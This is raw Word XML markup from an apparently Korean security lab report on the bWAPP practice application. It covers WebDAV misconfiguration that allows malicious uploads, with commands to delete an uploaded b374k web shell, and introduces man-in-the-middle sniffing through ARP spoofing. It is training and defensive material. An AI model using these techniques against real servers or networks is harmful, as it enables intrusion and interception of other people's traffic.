    <w:p w14:paraId="2AC2FF76" w14:textId="15CF124F" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FE1C44" w14:textId="068F460E" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417F4966" w14:textId="4B2F9E61" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDBBE49" w14:textId="151FE890" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0429A17A" w14:textId="4C246B89" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3E32AC" w14:textId="692ACA65" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A383B2" w14:textId="010018F0" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00FA66E1">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF64D52" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="008868CF">
      <w:pPr>
        <w:rPr>
          <w:b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EF1860" w:rsidRPr="00BE7966" w14:paraId="360563C0" w14:textId="77777777" w:rsidTr="00A8495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68EBB82C" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRPr="00BE7966" w:rsidRDefault="00EF1860" w:rsidP="00A849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2E81B316" wp14:editId="40C01288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505D8" id="직사각형 11" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.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vN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CdyovN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EF1860" w:rsidRPr="0050741D" w14:paraId="661468B6" w14:textId="77777777" w:rsidTr="00A8495D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07D08895" w14:textId="6C4F5D4A" w:rsidR="00EF1860" w:rsidRPr="0050741D" w:rsidRDefault="00EF1860" w:rsidP="00A8495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진단 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1860" w:rsidRPr="00BE7966" w14:paraId="3C9C8EA2" w14:textId="77777777" w:rsidTr="00A8495D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3801EAE1" w14:textId="1A59F111" w:rsidR="00EF1860" w:rsidRPr="00BE7966" w:rsidRDefault="00EF1860" w:rsidP="00A8495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2393C672" wp14:editId="1C43F56F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4" name="직사각형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4BCF8" id="직사각형 14" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3pt;margin-top:-53.15pt;width:533.25pt;height:766.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Eb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u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EF1860" w:rsidRPr="00B67587" w14:paraId="16FD634C" w14:textId="77777777" w:rsidTr="00A8495D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D18AEF9" w14:textId="2F93DB46" w:rsidR="00EF1860" w:rsidRPr="00B67587" w:rsidRDefault="00EF1860" w:rsidP="00EF1860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W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ebDAB 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기능 활성화 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1860" w:rsidRPr="00BE7966" w14:paraId="2F902782" w14:textId="77777777" w:rsidTr="00A8495D">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1736A956" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRPr="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WebDAV </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">기능 활성화 확인 </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>타겟 호스트)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270B101A" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRPr="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="3"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">ttpd.conf </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>파일 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E757056" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="1612" w:firstLine="374"/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d /etc/apache2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A638A9B" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="1600" w:firstLine="386"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t># vi httpd.cond</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C91D6C" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="786"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025501D">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBBA930" wp14:editId="7730D00C">
                  <wp:extent cx="5760000" cy="700050"/>
                  <wp:effectExtent l="19050" t="19050" r="12700" b="2413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700050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  <w:p w14:paraId="097A8C28" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRPr="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="3"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>bWAPP</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">에 </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WebDAV </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>기능이 활성화되어 있는 것을 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5F9ECB" w14:textId="13568501" w:rsidR="00EF1860" w:rsidRDefault="008112DB" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="786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9393E51" wp14:editId="0E260C37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906780</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2828290" cy="273685"/>
                      <wp:effectExtent l="19050" t="19050" r="10160" b="12065"/>
                      <wp:wrapNone/>
                      <wp:docPr id="64" name="직사각형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290" cy="2736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0B5A7" id="직사각형 64" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:40.85pt;margin-top:71.4pt;width:222.7pt;height:21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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00EF1860" w:rsidRPr="0025501D">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="717CAA2D" wp14:editId="0AD3C6C5">
                  <wp:extent cx="5760000" cy="1551632"/>
                  <wp:effectExtent l="19050" t="19050" r="12700" b="1079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002" t="1584" r="1" b="-1"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5760000" cy="1551632"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="9522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5B976F" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRPr="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="3"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>webDAV</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>의</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1860">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">디렉터리 확인 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCD2DF5" w14:textId="331F673C" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
            <w:pPr>
              <w:ind w:firstLine="800"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025501D">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FFFFC5" wp14:editId="734AD247">
                  <wp:extent cx="5760000" cy="710506"/>
                  <wp:effectExtent l="19050" t="19050" r="12700" b="1397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710506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83E97" w14:textId="5B15FFDE" w:rsidR="004C2099" w:rsidRPr="008112DB" w:rsidRDefault="004C2099" w:rsidP="00EF1860">
            <w:pPr>
              <w:ind w:firstLine="800"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7605DFC1" w14:textId="36860A83" w:rsidR="004C2099" w:rsidRPr="004017AB" w:rsidRDefault="008868CF" w:rsidP="004C2099">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004017AB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="004017AB">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t xml:space="preserve">ebDAV </w:t>
            </w:r>
            <w:r w:rsidRPr="004017AB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t xml:space="preserve">기능이 활성화되어있기 때문에 이를 이용하여 디렉토리 검색 및 악의적인 파일을 업로드 할 수 있음 </w:t>
            </w:r>
            <w:r w:rsidR="00416593">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>즉,</w:t>
            </w:r>
            <w:r w:rsidR="00416593">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t xml:space="preserve"> webDAV</w:t>
            </w:r>
            <w:r w:rsidR="00416593">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>를 비활성화 하는 방법이 보안상 가장 안전</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EEC0532" w14:textId="5E8A4383" w:rsidR="00EF1860" w:rsidRPr="00BE7966" w:rsidRDefault="00EF1860" w:rsidP="00A8495D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EF1860" w:rsidRPr="0058148E" w14:paraId="1EFBAE25" w14:textId="77777777" w:rsidTr="00A8495D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484876A0" w14:textId="408CF3E6" w:rsidR="00EF1860" w:rsidRPr="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860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파일 삭제</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58EBF650" w14:textId="12EFF36A" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>업로드 된 파일 삭제</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79370A" w14:textId="242C775D" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cd /var/www/bWAPP/documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E413B84" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>m b374k-3.2.2.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279542B2" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> rm test.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A6118" w14:textId="7025C247" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00EF1860">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386039C3" wp14:editId="7997AD92">
            <wp:extent cx="5760000" cy="1106211"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1778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06211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AE7893" w14:paraId="13C7773B" w14:textId="77777777" w:rsidTr="00A8495D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BE7CD2" w14:textId="1A5026AE" w:rsidR="00AE7893" w:rsidRPr="006F2E6D" w:rsidRDefault="00F91FA0" w:rsidP="00A8495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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AE7893"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AE7893">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>MITM</w:t>
            </w:r>
            <w:r w:rsidR="002D35C4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AE7893">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
            <w:r w:rsidR="002D35C4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>&amp;SMTP)</w:t>
            </w:r>
            <w:r w:rsidR="00AE7893">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AE7893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개요 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7893" w14:paraId="3B9F6328" w14:textId="77777777" w:rsidTr="00A8495D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6635DE55" w14:textId="5CB281BA" w:rsidR="00AE7893" w:rsidRPr="00637AED" w:rsidRDefault="00AE7893" w:rsidP="00A8495D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AE7893" w14:paraId="16114341" w14:textId="77777777" w:rsidTr="00A8495D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6CABCE2B" w14:textId="2688AA79" w:rsidR="00AE7893" w:rsidRPr="00DA12CE" w:rsidRDefault="00DA12CE" w:rsidP="00DA12CE">
            <w:pPr>
              <w:ind w:firstLine="285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DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1.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</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE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Security Misconfiguration </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7893" w14:paraId="5A183CF4" w14:textId="77777777" w:rsidTr="00A8495D">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C2B01A6" w14:textId="741E073E" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00DA12CE">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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잘못된 보안 구성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68EAFA85" w14:textId="4FBC5081" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00DA12CE">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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서버/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시스템/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DB/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네트워크 장비/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웹 설정 오류로 인하여 발생하는 취약점이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4DE35D" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="0044016F" w:rsidRDefault="00AE7893" w:rsidP="00DA12CE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DA12CE" w14:paraId="0F58383F" w14:textId="77777777" w:rsidTr="00A8495D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D6824CB" w14:textId="2DFCA2F7" w:rsidR="00DA12CE" w:rsidRPr="00DA12CE" w:rsidRDefault="00DA12CE" w:rsidP="00DA12CE">
            <w:pPr>
              <w:ind w:firstLineChars="150" w:firstLine="285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2. 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M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>an-in-the-Middle Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00E4EA9A" w14:textId="7A2E077D" w:rsidR="00AE7893" w:rsidRPr="002D35C4" w:rsidRDefault="002D35C4" w:rsidP="00AE7893">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia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030F7484" wp14:editId="293CE7E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772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0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73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D6515" id="직사각형 109" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:766.5pt;z-index:-251468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LmTtQIAAK8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  <w:r w:rsidR="00DA12CE" w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA12CE" w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r w:rsidR="00DA12CE" w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>중간에 공격자가 사용자 패킷을 훔쳐보거나 갈취하는 스니핑 공격이다.</w:t>
      </w:r>
      <w:r w:rsidR="00DA12CE" w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A3145" w14:textId="2C595566" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893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DA12CE" w:rsidRPr="00DA12CE" w14:paraId="00F98A33" w14:textId="77777777" w:rsidTr="00A8495D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399AC161" w14:textId="338C94EA" w:rsidR="00DA12CE" w:rsidRPr="00DA12CE" w:rsidRDefault="00DA12CE" w:rsidP="00A8495D">
            <w:pPr>
              <w:ind w:firstLine="285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>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.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</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE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Security Misconfiguration – </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE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M</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ITM(HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65A508FC" w14:textId="4F9AF3C9" w:rsidR="0044016F" w:rsidRPr="002D35C4" w:rsidRDefault="00DA12CE" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044016F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이 시나리오는 </w:t>
      </w:r>
      <w:r w:rsidRPr="0044016F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r w:rsidRPr="0044016F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 사용하지 않은 통신에서 평문 데이터가 </w:t>
      </w:r>
      <w:r w:rsidRPr="0044016F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r w:rsidRPr="0044016F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스푸핑 공격을 통하여 노출되는 것을 확인하는 내용이다.</w:t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2D35C4" w:rsidRPr="00DA12CE" w14:paraId="622F6AF6" w14:textId="77777777" w:rsidTr="005E13EB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6B34C326" w14:textId="2795C6E1" w:rsidR="002D35C4" w:rsidRPr="00DA12CE" w:rsidRDefault="002D35C4" w:rsidP="005E13EB">
            <w:pPr>
              <w:ind w:firstLine="285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>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.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</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE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Security Misconfiguration – </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE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M</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ITM(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>MTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA12CE">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22EDD796" w14:textId="0D50EE71" w:rsidR="0044016F" w:rsidRPr="002D35C4" w:rsidRDefault="002D35C4" w:rsidP="002D35C4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
